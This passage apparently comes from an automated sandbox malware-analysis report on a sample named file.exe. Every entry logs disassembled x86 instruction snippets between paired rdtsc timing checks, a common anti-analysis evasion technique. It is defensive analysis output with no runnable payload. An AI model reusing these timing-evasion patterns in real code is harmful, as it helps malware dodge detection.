[ebp+1247A58Fh], ecx 0x0000006c nop 0x0000006d pushad 0x0000006e push eax 0x0000006f push edx 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D098E second address: 10D09A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38EF6171h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D3A7C second address: 10D3A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D3A80 second address: 10D3A84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D7EE2 second address: 10D7EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DBA5C second address: 10DBA84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38EF6172h 0x00000007 jmp 00007FBD38EF616Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push edi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DFC03 second address: 10DFC1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD3971C782h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DFF1D second address: 10DFF23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EA404 second address: 10EA41D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD3971C781h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8FF0 second address: 10E8FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8FF4 second address: 10E900E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FBD3971C780h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E979E second address: 10E97AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FBD38EF6166h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E97AB second address: 10E97BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ecx 0x0000000a ja 00007FBD3971C77Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E97BD second address: 10E97CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnl 00007FBD38EF6166h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E994A second address: 10E9952 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E9952 second address: 10E995C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBD38EF6166h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E995C second address: 10E997D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBD3971C789h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E9F12 second address: 10E9F55 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FBD38EF616Eh 0x00000008 jnc 00007FBD38EF6166h 0x0000000e pop esi 0x0000000f jmp 00007FBD38EF616Ch 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FBD38EF6177h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E9F55 second address: 10E9F5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E9F5E second address: 10E9F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E9F65 second address: 10E9F6F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBD3971C77Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EA0C1 second address: 10EA0C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EA0C6 second address: 10EA0E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBD3971C786h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EE8BF second address: 10EE8C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EEFFD second address: 10EF007 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBD3971C776h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EF13B second address: 10EF148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jbe 00007FBD38EF6166h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108824B second address: 1088255 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBD3971C776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1088255 second address: 108825B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108825B second address: 108825F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EE30E second address: 10EE313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EE313 second address: 10EE31B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F534E second address: 10F535B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBD38EF6166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4077 second address: 10F407B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F407B second address: 10F4084 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F434C second address: 10F4357 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FBD3971C776h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4357 second address: 10F436A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FBD38EF6166h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FBD38EF6166h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4670 second address: 10F4674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4674 second address: 10F467A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F3D82 second address: 10F3D86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4A7B second address: 10F4AA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38EF616Dh 0x00000007 ja 00007FBD38EF6166h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBD38EF6173h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4AA9 second address: 10F4AB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4BE3 second address: 10F4BF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FBD38EF616Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4BF4 second address: 10F4C13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007FBD3971C77Ah 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jo 00007FBD3971C792h 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4D85 second address: 10F4D96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FBD38EF616Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F84C8 second address: 10F84D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F84D9 second address: 10F850E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FBD38EF6171h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBD38EF6176h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F850E second address: 10F8512 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD686 second address: 10FD68A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FC568 second address: 10FC571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FC571 second address: 10FC579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C49F3 second address: 10A4067 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBD3971C778h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FBD3971C778h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 xor dword ptr [ebp+1247D1A6h], ebx 0x0000002f mov dword ptr [ebp+122D1B2Ch], ebx 0x00000035 call dword ptr [ebp+122D2AD3h] 0x0000003b jnp 00007FBD3971C7A5h 0x00000041 push eax 0x00000042 push edx 0x00000043 js 00007FBD3971C77Ch 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C4B8D second address: 10C4B97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FBD38EF6166h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C4FB1 second address: 10C4FB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C4FB5 second address: 10C4FD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBD38EF6177h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C4FD6 second address: 10C4FDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C56BF second address: 10C56C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FBD38EF6166h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C56C9 second address: 10C5717 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBD3971C776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007FBD3971C788h 0x00000012 push 0000001Eh 0x00000014 mov ecx, dword ptr [ebp+1247DCEEh] 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jp 00007FBD3971C78Eh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C585E second address: 10C5865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5A29 second address: 10C5A3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3971C77Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5A3D second address: 10C5A72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38EF616Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a nop 0x0000000b sbb edx, 6B76CCFDh 0x00000011 mov edx, dword ptr [ebp+12463392h] 0x00000017 lea eax, dword ptr [ebp+12486761h] 0x0000001d mov ecx, dword ptr [ebp+122D35BAh] 0x00000023 mov dl, 0Fh 0x00000025 nop 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 ja 00007FBD38EF6166h 0x0000002f pop eax 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5A72 second address: 10C5AC2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jg 00007FBD3971C787h 0x0000000f jmp 00007FBD3971C781h 0x00000014 nop 0x00000015 add di, E6EBh 0x0000001a lea eax, dword ptr [ebp+1248671Dh] 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007FBD3971C778h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 00000016h 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a push eax 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5AC2 second address: 10C5AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5AC6 second address: 10A4B28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a call dword ptr [ebp+122D2BBCh] 0x00000010 jmp 00007FBD3971C77Eh 0x00000015 push edi 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FC865 second address: 10FC87F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBD38EF616Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FC87F second address: 10FC89D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FBD3971C778h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push ebx 0x00000015 js 00007FBD3971C776h 0x0000001b pushad 0x0000001c popad 0x0000001d pop ebx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FC9D7 second address: 10FC9DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FC9DC second address: 10FC9FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3971C789h 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FBD3971C776h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FCB21 second address: 10FCB27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FCB27 second address: 10FCB2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FCB2B second address: 10FCB2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FCB2F second address: 10FCB35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FCB35 second address: 10FCB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FBD38EF6176h 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD280 second address: 10FD284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD284 second address: 10FD28C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1101086 second address: 110108D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10729D4 second address: 10729DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10729DB second address: 1072A0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3971C789h 0x00000007 pushad 0x00000008 jmp 00007FBD3971C784h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11045AE second address: 11045B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1107871 second address: 1107877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10867C3 second address: 10867D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38EF616Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10867D1 second address: 10867F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FBD3971C786h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11073C4 second address: 11073C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11073C8 second address: 11073D2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBD3971C776h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11073D2 second address: 11073EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007FBD38EF616Ah 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11073EC second address: 11073F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11073F0 second address: 11073F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11073F4 second address: 1107422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBD3971C776h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d je 00007FBD3971C79Dh 0x00000013 jmp 00007FBD3971C781h 0x00000018 push eax 0x00000019 push edx 0x0000001a je 00007FBD3971C776h 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1107422 second address: 1107428 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D3CF second address: 110D3F8 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBD3971C77Ch 0x00000008 je 00007FBD3971C776h 0x0000000e push eax 0x0000000f jmp 00007FBD3971C780h 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D3F8 second address: 110D3FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D3FE second address: 110D40C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FBD3971C776h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D40C second address: 110D420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FBD38EF616Dh 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D420 second address: 110D42A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBD3971C77Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D58F second address: 110D598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D598 second address: 110D59C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
